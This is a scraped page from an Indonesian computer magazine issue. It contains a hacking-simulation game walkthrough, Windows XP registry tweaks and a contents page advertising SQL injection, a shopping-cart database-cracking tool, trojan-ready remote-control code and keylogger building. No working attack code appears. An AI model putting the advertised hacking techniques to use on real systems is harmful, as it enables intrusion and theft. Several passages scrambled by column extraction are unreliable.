Web Hacking_ Web Design dengan Photoshop

Document Sample
Web Hacking_ Web Design dengan Photoshop Powered By Docstoc
					NeoSoft

Dark Signs 9.01
Hacker Game Console
Apakah anda sudah merasa seorang hacker? Coba dulu game ini dan rasakan sendiri keasyikan yang didapat dari game tersebut. Jangan hanya mengaku seorang hacker jika belum mencoba game ini dan buktikan jika anda benar-benar seorang hacker.
sebuah game yang mensimuD ark Signs adalahsebuah jaringan dan mengijinlasi lingkungan kan anda memainkannya sebagai seorang hacker maupun seorang cracker. Game ini sebenarnya masih dalam pengembangan, tetapi anda sudah dapat memainkannya dan keasyikannya tetap terasa. Memulai Game Dalam game ini, anda memiliki misi-misi yang harus diselesaikan. Misi tersebut dikirimkan melalui email, jadi anda nantinya akan memiliki sebuah account email setelah mendaftar sebagai new user. Informasi yang didapat adalah adanya 2 port yang terbuka pada securedigital.com yaitu port 25 dan 80. Connect Hacking banyak memanfaatkan port 80, untuk itu coba connect ke port 80. Anda berhasil memasuki sistem dengan memanfaatkan port 80. Ada terdapat 5 opsi yang dapat anda pilih, berdasarkan misi yaitu mendapatkan Internal Service Phone Number maka ketikkan opsi nomor 5 Anda akan menemukan kata-kata yang tidak dimengerti dan koneksi terputus, tapi anda berhasil mendapatkan username dan password admin: User: secure Password: digital Trace Sekarang trace target untuk mendapatkan info mesin-mesin yang berjalan pada target. Kemudian scan mesin-mesin tersebut dan coba connect ke mesin-mesin tersebut dan cari info sesuai misi anda. Kelihatannya anda belum beruntung karena belum mendapatkan hal yang berarti, tapi tidak salah anda coba kembali melakukan trace pada target. Game belum berakhir jika anda belum menuntaskan misi anda. Bagaimana misi itu tuntas? Jika anda sudah mendapatkan info Internal Service Phone Number.

Perhatikan Gambar di atas, untuk memulai permainan anda diminta mengetikkan MAIL untuk check email dan melihat misi anda. Jika masih bingung, ketikkan HELP untuk melihat tutorial game. Sebelumnya tekan sembarang tuts keyboard sebelum mengetikkan MAIL atau HELP. Ketikkan MAIL untuk memeriksa email. Akan muncul beberapa opsi yang dapat dipilih. Ketikkan 1 untuk melihat email yang masuk, anda akan melihat ada 2 email. Ketikkan nomor 1 atau 2 untuk membaca email. Anda sebaiknya mulai dengan training mission, ketikkan 1 maka anda akan melihat isi email dan melihat misi anda. Memulai Misi Untuk memulai menjalankan misi, keluar dari opsi membaca email. Perhatikan petunjuk yang berada di bagian bawah untuk keluar dari opsi membaca email. Misi anda adalah mendapatkan Internal Service Phone Number dan petunjuk untuk memulai hacking adalah Securedigital.com. Scan Pertama kali yang perlu dilakukan adalah melakukan scan terhadap target yaitu securedigital.com untuk mencari informasi-informasi yang dibutuhkan.

HomePage Harga NeoTek + CD: Rp20.000,- (P. Jawa) Rp22.000,- (Luar P. Jawa)

Dunia Teknologi Baru

N EOTE K

Salam!
Web Hacking Bukan Hanya Deface Situs

Anatomi suatu serangan hacking

Footprinting

Scanning

Enumeration

Gaining Access

Escalating Privilege

• Pelaku deface situs sebenarnya mempunyai jiwa seni juga seperti contoh di atas, sedangkan yang lebih berjiwa bisnis lebih berkonsentrasi pada pencurian database.

Pilfering

Covering Tracks

Creating Backdoors Denial of Service

ahukah anda bahwa serangan terhadap suatu sistem jaringan paling banyak terjadi melalui port 80, yang pada dasarnya adalah port yang harus dibuka oleh suatu situs web? Kerugian yang dapat diakibatkannya pun bukan main-main, terlebih lagi apabila yang kena serang itu adalah situs web e-commerce. Selain membahas web hacking secara umum, kali ini dibahas juga dua kasus: SQL Injection dan Kelemahan Comersus shopping cart.

T

Redaksi redaksi@neotek.co.id

Lengkapi pengetahuan hacking dan PC security anda dengan berlangganan majalah NeoTek: Hubungi KRISHNAdiSTRIBUTOR Tel. (021) 5835 0080 HP. (0816) 1187 111 (Boedi) email: krishnadistributor@neotek.co.id Kontak: Boedi Krishnadi

Bagaimana menghubungi N EOTEK?
KONTRIBUSI ARTIKEL
redaksi@neotek.co.id

ADMINISTRASI IKLAN
Tel. 021-5481457 Tel. 021-5481457

SURAT PEMBACA WEBMASTER

Fax. 021-5329041

support@neotek.co.id webmaster@neotek.co.id

SIRKULASI NEOTEK ALAMAT REDAKSI
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482 email: kosasih@indo.net.id

PEMASARAN
#neoteker

Hedhi Sabaruddin, 0812-1891827

CHATROOM DI DALNET MILIS PARA NEOTEKER

http://groups.yahoo.com/group/majalahneotek

Vol. IV No. 05 NeoTek

1

Daftar Isi

Daftar Isi
FOKUS VOL. IV NO. 5

NeoTek Vol. IV No. 5
NeoTekno
22
Web Hacking: Kerawanan Port 80
Web hacking bukan sekedar deface dengan memanfaatkan unicode bug, melainkan juga karakteristik dasar seperti opsi baca tulis pada protokol HTTP, kelemahan dasar HTML form, bahaya scripting, maupun kelemahan Microsoft SQL server dalam menangani inputinput ilegal.

REGISTRY HACKING HACKING

Utak-atik Windows XP

NeoStart
6 8
Siapa dan Boleh Apa Saja?
Bukan seperti pada Windows 9x/ME, user login pada Windows XP bukan sekedar kosmetik.

10

Bongkar Pasang Komponen

26

Web Hacking: SQL Injection

Lengkapi atau hilangkan fitur tertentu dari standar Windows XP, termasuk menggunakan Group Policies pada Windows XP Professional.

Membahas lebih jauh kelemahan Microsoft SQL dalam memproses illegal entry yang akibatnya sangat berbahaya.

12

Stop Windows Messenger!

30

Web Hacking: Comersus Bug

Lebih Lanjut dengan Registry

Cara terbaik menyetel perilaku Windows XP sesuai keinginan anda.

Ada berbagai cara mencegah Windows Messenger berjalan otomatis setelah Windows XP di-start, termasuk cara uninstall yang oleh Microsoft memang disembunyikan.

Bukan hanya database dari shopping cart ini mudah di-download, tool untuk mendekripsi password database ini juga sudah tersedia. Bagaimana bila database itu berisi nomor-nomor kartu kredit?

Situs NeoTek
Link Langsung
Kunjungi situs-situs yang dibahas di majalah NeoTek dengan sekali klik lewat situs NeoTek.

www.neotek.co.id

NeoStyle
14
Instalasi Pinnacle Studio 8/Hollywood FX
Jawaban terhadap banyaknya pertanyaan mengenai instalasi Pinnacle Studio 8, khususnya sehubungan dengan instalasi Hollywood FX.

Jadikan situs NeoTek sebagai pangkalan Anda berselancar

Layanan Rupa-rupa NeoTek
Channel #neoteker di Dalnet Ngobrol ramai-ramai sesama NeoTeker Web Chat Room Kini tidak usah jauh-jauh untuk ngobrol langsung dengan sesama NeoTeker Mailing List Ini yang paling ramai. Segera ikutan berbagi pengalaman berinternet! NeoTeker Official Portal http://www.neoteker.or.id Situs komunikasi antar Neoteker. Neoteker Internet Radio http://dj.neoteker.or.id:8000

NeoTek versi PDF

Kehabisan NeoTek di kota Anda? Dapatkan saja versi PDF-nya. Gratis!

Download

45

Graphical Web Design: Photoshop

Tersedia juga download di situs NeoTek selain dari situs aslinya

Bagian pertama dari pembahasan proyek membentuk situs web menggunakan Photoshop, Image Ready, dan Dreamweaver.

2

NeoTek Vol. IV No. 05

Daftar Isi

NeoTutor
17 19
Java Workshop: Java dan Port I/O
Pada dasarnya Java tidak dapat membaca/menulis port I/O. Untuk itu diperlukan bantuan Visual C++

NeoSoft
0
Battlefield 1942 Secret Weapon of WW II
First man shooting game dengan skenario dalam Perang Dunia II

Java Workshop: Remote Control

NeoProfil
38
Delphi Workshop: Inno Installer

Aplikasi port I/O untuk Java, berupa suatu program remote control berbasis web dengan memanfaatkan Tomcat sebagai servlet container.

3

Editorial Office
4 Cairnhill Rise #05-01 The Cairnhill Singapore 229740 Telp. +65-67386482

32

VB Workshop: Email Client Winsock

Kemas software karya anda menjadi suatu installer tunggal agar mudah digunakan dan didistribusikan menggunakan Inno Installer yang source code-nya juga tersedia.

Business Office
Gedung Cahaya Palmerah 503 Jl. Palmerah Utara III No. 9 Jakarta 11480 Telp. 021-5481457 Fax. 021-5329041

Selain memanfaatkan dvmailer.dll, program email client juga dapat dibuat dengan memanfaatkan Microsoft Winsock Control.

40

Delphi Workshop: Cyber Merpati

34

VB Workshop: Remote Control

Remote control selalu menjadi topik menarik. Dengan Visual Basic anda dapat membuat program remote control sendiri yang dapat dikembangkan lebih lanjut menjadi trojan.

Membuat email client sendiri menggunakan Delphi 7, yang mempunyai kelebihan fleksibilitas dibandingkan dengan Outlook Express.Dengan email client ini akan mudah mengubah-ubah parameter atau variabel sebelum mengirim email seperti X-Mailer, Extra Header, dan lain-lain.

Pemimpin Umum
Fachri Said

Pemimpin Redaksi
Kosasih Iskandarsjah

Redaktur Ahli
Onno W. Purbo Michael S. Sunggiardi

36

VB Workshop: Screen Saver

42

C++ Workshop: Pengkodean Base64

Pemimpin Usaha
Fahmi Oemar Dadang Krisdayadi

Membuat screen saver sendiri yang akan menjadi komponen untuk program-program lainnya.

Artikel penutup dari rangkaian artikel mengenai membuat sendiri keylogger menggunakan Visual C++

Redaktur Pelaksana
MA Rody Candera

Sekretaris Redaksi
Marni

NeoRagam

NeoTek Vol. IV No. 06 Computer Forensics
Kenali bagaimana para cyber cop menangani kasus-kasus kriminalitas yang melibatkan penggunaan komputer serta apa saja tool yang digunakannya yang dapat diterima sebagai evidence di pengadilan.

Webmaster
Supriyanto

4 5 45

Klak Klik Battlefield 1942 DarkSigns 0.91 Hacking Simulation Game Digital Video: dari satu format ke format lain Daftar Isi CD NeoTek Tweak, Benchmark, Diagnostic Windows XP Tweak Tool Game Benchmark Diagnostic Tools Graphical Web Design (I)
Mendayagunakan Photoshop untuk membuat web site berbasis grafis.

Sirkulasi
Hedhi Sabaruddin, Denny

Adm. Langganan
KRISHNAdiSTRIBUTOR

Iklan dan Promosi
Gianto Widianto

Psikologis Hacking
Tool yang tepat hanya salah satu faktor saja dalam keberhasilan menembus suatu sistem jaringan. Social engineering ternyata jauh lebih berperan dalam keberhasilan ini.

Keuangan
Aswan Bakri

Bank
Bank BNI a.n. PT NeoTek Maju Mandiri No. rekening 070.001709720.001 Bank BCA Matraman
(khusus untuk langganan)

a.n. Boedi Krishnadi No. rekening 342-239-1611

Vol. IV No. 05 NeoTek

3

NeoRagam

Klak Klik
GAME BULAN INI
Battlefield 1942 Secret Weapon of World War II

Digital Video: Dari Satu Format ke Format Lain
dan seni mengurangi ukuran file video menjadi lebih kecil sehingga mudah disimpan atau dipindahkan. Kompresi terutama penting apabila anda perlu mentransfer video dari kamera ke hard disk, CD, DVD, atau bahkan mailbox seseorang. Hal ini karena dalam video terdapat 25 frame per detik dan setiap frame ukurannya 414.720 pixel (720 x 576 pixel), yang setiap pixel memerlukan memory 8 bit. Artinya satu frame yang belum dikompresi akan memakan memory 3,3MB dan pada video PAL (25 fps) yang panjangnya satu jam akan memerlukan hard disk 297 GB atau setara dengan 425 buah CD!

K

OMPRESI ADALAH ILMU

Berbagai Metode Kompresi
Untungnya berbagai kamera video masa kini sudah dilengkapi dengan berbagai jenis kompresi. Berbagai jenis kompresai ini bekerja menggunakan satu atau kombinasi dari beberapa metode berikut:
• Menciutkan dimensi video, menjadikan video clip dimainkan dalam ukuran kecil. • Mengurangi frame rate dari 25 fps menjadi 15 fps atau lebih kecil, tetapi video akan tampak patah-patah. • Menghilangkan warna dan bayang-bayang yang tidak terlihat oleh mata telanjang, yang merupakan metode yang digunakan oleh digital video (DV) dalam mengkompresi hasil bidikan dalam MiniDV tape. • Mengabaikan blok pixel yang identik pada suatu urutan fra-

168 MB

me, seperti yang digunakan pada VCD dan DVD yang menggunakan kompresi MPEG. • Mengekspresikan gambar obyek dalam bentuk matematis sederhana, suatu cara yang digunakan dalam teknologi baru seperti pada video DivX atau MPEG-4.

nda mengendalikan berbagai senjata rahasia yang paling ganas dan mematikan. Senjata ini didapat langsung dari labotatorium sekutu maupun poros JermanItalia-Jepang dan sama sekali belum diuji dalam pertempuran.

A

Tidak ada kompresi yang sempurna. Untuk gambar bermutu tinggi dan editing yang mudah, DV (digital video) tetap merupakan standar de facto, tapi MPEG-1 (VCD) dan MPEG-2 (DVD) populer untuk home video. Kini sudah terdapat banyak aplikasi untuk mengkonversi suatu format video ke format lainnya, suatu proses yang dikenal sebagai proses transcoding.

Anda mendapat kesempatan mencoba Wasserfall Guided Rocket, Natter Rocket Plane, dan Rocket Pack yang revolusioner di medan pertempuran. Hidup atau mati akan sangat tergantung dari cara menangani senjata-senjata rahasia ini.
Pentium III 500, RAM128 64MB 3D accelerator card Dark Signs 0.91 Console Based Hacking Game

KOMPRESI KAMERA VIDEO: BERBAGAI MACAM STANDAR Standar Digunakan di Kompresi DV Metode Pros Cons Terbaik untuk

• Kamera MiniDV • Menghilangkan • Near-broadcast qly • Ukuran file besar • Produksi video dan Digital 8 warna yang tak • Playback full 25fps • Set-top DV player dengan transisi • Dimungkinkan harganya mahal • Title. musik, dan terlihat serta

bayangan pada tiap frame

21 MB

MPEG-1 • Kamera digital still dengan movie-mode

• Menghilangkan

warna yang tak terlihat serta bayangan pada tiap frame • Mengurangi ukuran frame (352x240 pixel atau lebih kecil) dan frame rate (12-15 fps)

editing frame per (mulai 8 jutaan) frame • Didukung oleh hampir semua software video-editing • Ukuran file kecil • Pilihan software (300-650MB/jam) video editing • Dapat dimainkan terbatas • Gambar kecil dan pada Windows Media Player dan kadang-kadang Quick Time player patah-patah • Editing yang frame accurate tidak dimungkinkan

narasi

• Video greetings • E-mailing • Insert ke presen-

tasi Power Point

ame yang mensimulasi lingkungan network console, yang di sini anda dapat berperan sebagai hacker atau cracker. Fitur game ini mencakup DScript language, line commands, dan struktur direktori.

G

MPEG-2 • Sony MicroMV • JVC JY-HD10U • Hitachi DVD Camcorders • Panasonic VDR-M30 dan SV-AV100

• Menghilangkan • DVD quality warna yang tak • Ukuran file kecil

• Dukungan editing • Bluetooth web-

Pentium 200, RAM16

terbatas menggu- casting (kamera terlihat serta (2,4 GB/jam) nakan Sony Movie MicroMV). bayangan pada • Tidak lagi diperlu- Shaker, Ulead Video • DVD authoring • Menjaga mutu kan kompresi un- Studio 7, dan Pinnadengan memtuk DVD authoring cle Studio 8. • Frame accurate bandingkan frame dengan fraediting sulit dilaksame sebelumnya nakan. maupun yang berikutnya
• Kompresi lebih • Ukuran file kecil • Tidak cocok untuk lanjut dimung(256MB/jam) editing kinkan dengan • Mutu gambar baik mengekspresikan gambar sebagai bentuk dan tekstur matematis • Internet streaming • 3G mobile phone

MPEG-4 • Panasonic SV-AV100

4

NeoTek Vol. IV No. 05

NeoRagam

Tweak, Benchmark, Diagnostic
CD NeoTek kali ini terutama berisi tiga kategori yang berhubungan erat dengan kinerja komputer anda, tweak, benchmark, dan diagnostic. Windows XP Tweak Tool Tweaking tool utama untuk Windows XP berasal dari Microsoft, yaitu Tweak UI yang merupakan bagian dari Windows XP Power Toys. Selain itu disediakan juga TweakNow Power Pack 2003, dan Tweak-XP. Untuk melengkapi arsenal anda, disediakan juga LockIT XP dan XP Visual Tools, lengkap dengan serial numbernya. Game Benchmark Bukan rahasia lagi kalau home computer yang digunakan untuk game sekarang harus jauh lebih powerful dibandingkan komputer untuk bisnis. Tidak heran apabila alat untuk mengujinya pun berupa game pula. Quake III Arena dan Unreal Tournament 2003 sudah menjadi standar de facto untuk pengujian benchmarking terhadap hardware anda. Quark III Arena. Utilitas benchmarking yang disertakan pada game ini digunakan untuk menguji kemampuan grafis. Hasilnya berupa kinerja keseluruhan sistem anda dalam frame per detik. Install dan launch game ini dan tekan tombol tilde (~) untuk membuka jendela yang memanggil Quake console. Didalam console ini ketikkan timedemo 1 and tekan Enter. Keluar dari console, pilih Demos option dan jalankan Demo1. Setelah pengujian berakhir, tekan tombol tilde untuk mengungkap frame rate-nya. Unreal Tournament 2003. Pada game arena combat game yang tak mengenal kasihan ini telah tersedia build-in benchmarking tool yang memungkinkan anda menjalankan serangkaian timedemo, dan mencatat record-nya untuk anda. Terdapat dua mode uji: Flyby, yang membawa anda jalan-jalan ke dunia game dan mencatat skor frame rate sistem anda dan Botmatch, pegujian yang lebih berorientasi game serta pengujian CPU. Begitu selesai menginstal game ini, masuk ke direktori program utama UT2003. Secara default terinstal di root directory C:. Setelah mendapatkan folder ini, double-click dan akan tampil isinya. Cari subfolder System. Double-click, akan terlihat Benchmark.exe atau Benchmark bile ekstensinya disembunyikan. Double-click icon ini untuk menjalankan program benchmarking. Hard OCP Unreal Tournament 2003 Benchmark. Digunakan untuk menguji graphics card mutakhir. Untuk menguji grafik anada sendiri install program ini setelah menginstal Unreal Tournament 2003 demo. 3DMark03 build 340. Tool ini mengkombinasikan dukungan DirectX 9.0a dengan sejumlah grafis kompleks untuk menunjukkan hasil benchmark kinerja grafis 3D dari sistem anda. PCMark04 1.0. Suatu application-based benchmark dan merupakan tool yang amat baik untuk mengukur kinerja PC secara keseluruhan. menggunakan bagian-bagian dari aplikasi yang sebenarnya digunakan dan bukan satu aplikasi besar saja. Diagnostic Tools CPU-Z. Menampilkan informasi prosesor anda, mencakup nama, pemasok, core stepping and process, voltase, internal/external clock, informasi cache dan lain-lain. DiskSpeed32. Mengukur kecepatan hard disk dalam lingkungan Win32. Ditampilkan dalam bentuk grafis kecepatan per silinder. Intel Chipset Utilities. Menampilkan informasi mengenai chipset yang anda gunakan. Memtest86 3.0. Penguji memory untuk komputer berarsitektur x86. Uji memory BIOS hanya untuk pengecekan cepat dan banyak hal yang terdeteksi. Motherboard Monitor 5.3.5.1. Menampilkan informasi dari sensor chip pada motherboard di Windows system tray. Mendukung banyak kombinasi jenis chipsets dan sensor chip. SANDRA Standard 2004 (System Analyzer/Diagnostic and Reporting Assistant); seperangkat tool system diagnostic dan benchmarking yang dirancang untuk membantu anda menjalankan komputer pada kinerja puncaknya. HARDiNFO 2002 Professional. Aplikasi lengkap sistem informasi, diagnostik, benchmark, and computer management application. Register di www.pcuser.com.au/hardinfo untuk serial number.

daftar isi cd neotek
XP TWEAK TOOL
LockIT XP NTFS DOS 3.0.2 NTFS for Floppy NTFS for Windows 98 TweakNow Power Pack 2003 Tweak-XP XP Visual Tools 1.8.5 CmdHere Deskman HtmlGen Image Resizer Magnifier Power Calc Slide Show Task Switch Timer Shot Tweak UI Tweak UI for Itanium lockitxp.exe ntfs30r.zip ntfsflp.zip ntfs98ro.exe PowerPro.exe txp3setup xpvt.zip Password

Serial

MICROSOFT POWER TOYS XP

CmdHerePowertoySetup.exe DeskmanPowertoySetup.exe HtmlgenPowertoySetup.exe ImageResixerPowertoySetup.exe MagnifierPowertoySetup.exe PowerCalcPowertoySetup.exe SlideShowPowertoySetup.exe TaskswitchPowertoySetup.exe TimershotPowertoySetup.exe TweakUiPowertoySetup.exe TweakUiPowertoySetup_ia64.exe

GAME

Battlefield 1942 demo DarkSigns 0.91 full 3D mark 03 PC Mark 4.10 Quake III Arena Unreal Tournament 2003 UT 2003 Bechmarking

bg1942sw.exe darksign.exe 3dmark03.exe pcmark04.exe quake3.exe ut2003.zip ut2k3_bench_v20

GAME BENCHMARKING TOOL

DIAGNOSTIC TOOLS

CPU-Z cpuz120a.zip Diskspeed ds32.zip Hardinfo 2002 h2002pro Intel Chipset Utility chiputil.exe Memtest86 3.0 memt30.zip Motherboard Monitor 5.3.5.1 mbm5351.exe Sisoft Sandra Std. 2004 san2004.exe

hardinfo

SECURITY/PRIVACY

Ad-Aware 6 1.8.1 Anti Trojan 5.5 Cache & Cookie Washer Ella Spam Blocker Mail Washer pro 3.1 Netkeys Ultra Smart Popup Killer Spam Catcher for 98/ME Spam Catcher for XP Spybot Search & Destroy WinLock 3.2 full WinLock 4.0 Trial Zone Alarm 3.7 1.9.3

aaw6181.exe atro55en.exe ccwsetup.exe ella.exe mailwash.exe netkeys4.exe smartpop.exe sc98me.exe sc2kntxp.exe spybot12.exe winlock32.zip winlock4.zip za193.exe isetup-3.0.7.exe isetup-4.1.4.exe base64.zip comersusCrack.zip DecryptComersus.exe Cyber Merpati.zip PakPos212Public.zip SalomeWinsock.exe salomews.zip java_io.zip java_remote.zip Client.zip Server.zip ColorCircvarious.exe vbss.zip

INSTALLER PROYEK

Inno Setup 3.0.7 Inno Setup 4.1.4 Base64 Comersus Bug Email Client Delphi Email Client VB Winsock Java I/O Java Remote Control VB Remote Control VB Screen Saver

Vol. IV No. 05 NeoTek

5

NeoStart

Siapa dan Boleh Apa Saja?
Windows XP yang merupakan keluarga Windows NT seperti juga Windows 2000 maupun Windows Server 2003 kini menjadi sistem operasi yang paling banyak digunakan, khususnya XP Home Edition dan XP Professional. Bisa apa saja dengan Windows XP?
WINDOWS 9X ATAU ME YANG USER access pada dasarnya hanya merupakan polesan kosmetik, pada Windows XP dengan adanya administrator dan limited account, user policy dapat benar-benar diterapkan. Namun login menu tidak begitu aman, sebab

UTAK-ATI K WI N DOWS X P

B

ERBEDA DENGAN

menampilkan semua user yang ada. Untuk itu, anda dapat mengubah cara login dengan harus memasukkan baik user name maupun password, sehingga menjadi lebih aman. Software tertentu yang bila dijalankan akan terhubung dengan identitas pemakai seperti mIRC, Yahoo Messenger,

Administrator atau User Biasa?

1

USER ACCOUNT
Pilih Start > Control Panel dan double click User Accounts. Pilih Change the way user log on or off dan untick use the welcome screen. Tekan Windows+L untuk melihat hasilnya.

2

PROPERTIES SUATU PROGRAM
Klik kanan pada icon suatu program, misalnya mIRC, lalu pilih Properties untuk menampilkan jendela mIRC Properties. Pada tab Shortcut, klik tombol Advanced yang akan menampilkan jendela Advanced Properties.

3

DIFFERENT CREDENTIALS
Pada jendela Advanced Properties, tick Run with different credentials dan klik OK. Kini setiap kali menjalankan mIRC akan tampil jendela Run As yang menanyakan sebagai siapa anda akan menjalankan program ini sebagai siapa. Memudahkan apabila mempunyai beberapa nick name.

4

TIDAK SEMUA PROGRAM
Hal yang sama dapat diterapkan pada Yahoo Messenger, namun tidak dapat diterapkan untuk beberapa software dari Microsoft seperti Outlook Express ataupun software yang termasuk dalam Microsoft Office.

6

NeoTek Vol. IV No. 05

NeoStart
ataupun Outlook, dapat disetel agar setiap dijalankan akan menanyakan dulu akan dijalankan oleh siapa. Opsi ini tidak dapat diterapkan pada beberapa software Microsoft seperti Outlook Express ataupun Microsoft Office. Registry entry-nya adalah DWORD value. Value 1 artinya enable dan value 0 artinya disable. Anda perlu membentuk sendiri DWORD value yang bersangkutan, yang untuk NoChangeStartMenu dicontohkan pada langkah-langkah.
Registry Value NoSimpleStartMenu Policy Disable simple Start Menu dan mengharuskan classic Start Menu. NoStartMenuMFUprogramsList Membuang program yang sering digunakan dari Start Menu. NoStartMenuMorePrograms Membuang daftar More Programs dari Start Menu. GreyMSIAds Menampilkan program yang belum selesai instal sebagai gray di Start Menu. NoWindowsUpdate Membuang link Windows Update dari Start Menu. NoSMMyDocs Membuang folder MyDocuments dari Start Menu.

Utak-atik Registri
Lewat registri banyak hal mengenai perilaku dan cara kerja Windows XP dapat disetel. Salah satunya adalah memberi batasan terhadap limited user dalam mengakses Start Menu. Ada beberapa batasan yang dapat diterapkan, dan semuanya dilakukan pada cabang regtistry: HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Policies\Explorer Apabila batasan hendak dilakukan bukan user per user, melainkan secara keseluruhan, lakukan perubahan pada HKEY_LOCAL_MACHINE.

Mengunci Start Menu

1

JALANKAN REGEDIT
Dari Start > Run... ketikkan regedit dan klik OK untuk menampilkan Registry Editor. Dari sini masuk ke HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\ Policies\Explorer

2

BUAT ENTRI BARU
Klik kanan dan pada pane kanan pilih New > DWORD Value yang akan membentuk New Value #1. Klik kanan pada value baru itu dan pilih Rename. Kemudian ganti menjadi NoChangeStartMenu. Setelah itu klik kanan lagi pada NoChangeStartMenu dan ubah value data menjadi 1 dan klik OK.

DisablePersonalDirChange NoRecentDocsMenu MaxRecentDocs ClearRecentDocsonExit NoFavoritesMenu NoNetworkConnections

3

TAMPILAN REGISTRY YANG BARU
Tampak kini bahwa Explorer key sudah berisi DWORD value yang baru yaitu NoChangeStartMenu dengan data value 1, yang artinya kini user yang bersangkutan tidak lagi dapat mengubah-ubah Start menu maupun taskbar dengan cara drag-and-drop. Cara lain untuk mengubah Start menu dan taskbar masih dimungkinkan.

NoStartMenuNetworkPlaces NoFind NoRun NoClose

Mencegah user mengubah path ke folder My Documents Membuang folder Recent Docu ments dari Start Menu. Menetapkan banyaknya shortcut yang dapat ditampilkan pada submenu Recent Documents. Menghapus semua shortcut ke Re cent Documents begitu user log off. Mencegah user menambahkan artikel Favorite pada Start Menu. Menghilangkan artikel Network Connection dari Start Menu. Menghilangkan artikel Network Places dari Start Menu. Menghilangkan artikel Search dari Start Menu. Menghilangkan kemampuan men jalankan program melalui opsi Run pada Start Menu. Disable dan menghilangkan tom bol Turn Off Computer.

Vol. IV No. 05 NeoTek

7

NeoStart

Lebih Lanjut dengan Registry
Registry adalah jalan pintas untuk menyetel Windows XP agar berperilaku dan bekerja seperti yang anda inginkan. Namun cara ini berisiko, salah-salah komputer anda malah crash. Mem-backup registry adalah jalan yang sangat dianjurkan.
sewaktu mengutak-atik semua opsi atau setelan itu dapat saja Windows malah crash akibat salah menetapkan opsi. Namun bila tahu apa yang harus dikerjakan, cara ini sangat efektif untuk mencapai yang anda inginkan. Untuk membuat perubahan-perubahan pada registry anda harus login sebagai administrator, yang dilakukan melalui regedit (Start > Run lalu ketik regedit). Sebelum melakuS kan perubahan, ada baiknya memanfaatkan fungsi File > Export untuk mem-backup registry anda. Praktek yang sangat dianjurkan walaupun anda sangat yakin akan kemampuan anda sebagai registry hacker.

UTAK-ATI K WI N DOWS X P

M

AIN-MAIN DENGAN REGISTRY MEMANG RISKAN SEBAB

Menjaga Privacy
Anda juga dapat menjaga privacy anda agar orang lain tidak seenaknya ngintip apa yang telah anda lakukan pada komputer dengan jalan mengosongkan paging file (virtual memory) setiap kali shut down. Dapatkan: HKEY_LOCAL_MACHINE\System\CurrentControlSet\ Control\SessionManager\Memory Management dan tambahkan subkey ClearPageFileAtShutDown dengan DWORD value 00000001. Pada bagian ini juga dapatkan DisablePagingExecutive. Bila ini anda disable (dengan menetapkan setting menjadi 1 dan bukannya 0), anda artinya memerintahkan Windows agar tidak memindahkan file ke hard disk. Ini terutama berguna apabila anda mempunyai RAM lebih dari 256MB, sehingga Windows akan lebih responsif. Untuk membuat Windows lebih responsif lagi, dapatkan pula disini LargeSystemCache dan tetapkan nilainya menjadi 1. Sekali lagi ini dapat dilakukan apabila anda mempunyai RAM yang besar. Apabila tidak, sebaiknya jangan mengubah-ubah subkey ini.

Menampilkan Pesan Setiap Kali Startup
Untuk secara otomatis menampilkan pesan setiap kali Windows startup, jalankan regedit dan dapatkan HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Ubah nilai dari key LegalNoticeCaption misalnya isikan dengan Pesan dari Windows XP (atau namakan apa saja) Lalu ubah juga value dari key LegalNoticeText dengan teks apa saja yang anda inginkan. Suatu jendela yang namanya Pesan dari Windows XP akan tampil sebelum menampilkan logon screen dan dapat digunakan untuk berbagai kepentingan seperti pengingat, humor, ataupun mengolok-olok.

Membatasi Program yang Start Otomatis
Sewaktu Windows boot up, beberapa program akan dijalankan secara otomatis. Sering kali ada program yang tidak terlalu perlu atau program yang entah dari mana sudah terdapat di situ.

Ekspor dan Impor Registry untuk Backup dan Restore

1

MEM-BACKUP REGISTRY
Dari Start > Run... ketikkan regedit dan andapun menjalankan Registry Editor. Sebelum melakukan perubahan apa-apa, backup registry yang ada dengan memilih File > Export...

2

SAVE SEBAGAI FILE .REG
Akan tampil jendela Export Registry File yang meminta anda menyimpan registry ini sebagai suatu file .reg. Namakan misalnya sebagai backup.reg.

3

RESTORE REGISTRY
Anda dapat me-restore registry dengan File > Import... dan pilih backup.reg tadi untuk di-load kembali ke komputer anda.

8

NeoTek Vol. IV No. 05

NeoStart
Untuk membatasi program-program apa saja yang perlu dijalankan secara otomatis sewaktu boot up, dapatkan: HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run Program-program yang terlihat pada pane kanan adalah yang akan secara otomatis dijalankan apabila Windows boot up. Apabila yakin tidak diperlukan, klik kanan pada nama program itu dan pilih Delete. Ada baiknya juga periksa: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run untuk alasan yang sama. Tapi di sini kalau anda tidak yakin apa yang harus dilakukan, sebaiknya jangan ada yang diubah.

Shared Document
Folder Shared Documents yang dapat dilihat dan diakses oleh semua orang adalah fitur baru pada Windows XP, tetapi tidak semua orang menyukainya. Shared Documents juga ditampilkan pada bagian atas jendela My Computer di bawah judul Files Stored On This Computer. Apabila anda tidak ingin folder ini ditampilkan disini, dapatkan bagian registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\Explorer\My Computer\ NameSpace\DelegateFolders dan dapatkan subkey {59031a47-3f72-44a7-89c5-5595fe6b30ee} dan hapus subkey ini.

Mencegah Bluescreen of Death
Secara keseluruhan, Windows XP jauh lebih stabil dibandingkan versi-versi sebelumnya. Namun dapat saja suatu saat komputer anda crash dan menampilkan blue screen of death yang menjengkelkan itu. Anda dapat mengganti blue screen of death yang artinya hang itu menjadi reboot otomatis dengan cara, dapatkan: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\ Control\CrashControl lalu dapatkan subkey AutoReboot dan pastikan value-nya 1. Anda dapat mengubah waktu tunggu (application timeout value) sebelum Windows memutuskan bahwa suatu program mandeg atau crash pada: HKEY_CURRENT_USER\Control Panel\Desktop dapatkan subkey HungAppTimeout, klik kanan dan pilih Modify yang akan menampilkan jendela Edit String. Ubah Value data disini (default-nya 5000). Jangan tetapkan terlalu rendah, sebab bisa-bisa sebentar-sebentar komputer anda reboot secara otomatis. Angka delay ini apabila ditetapkan dengan tepat akan sangat menghemat waktu anda dari kerepotan akibat komputer hang dan blue screen of death.

Menambahkan Opsi Email pada Desktop
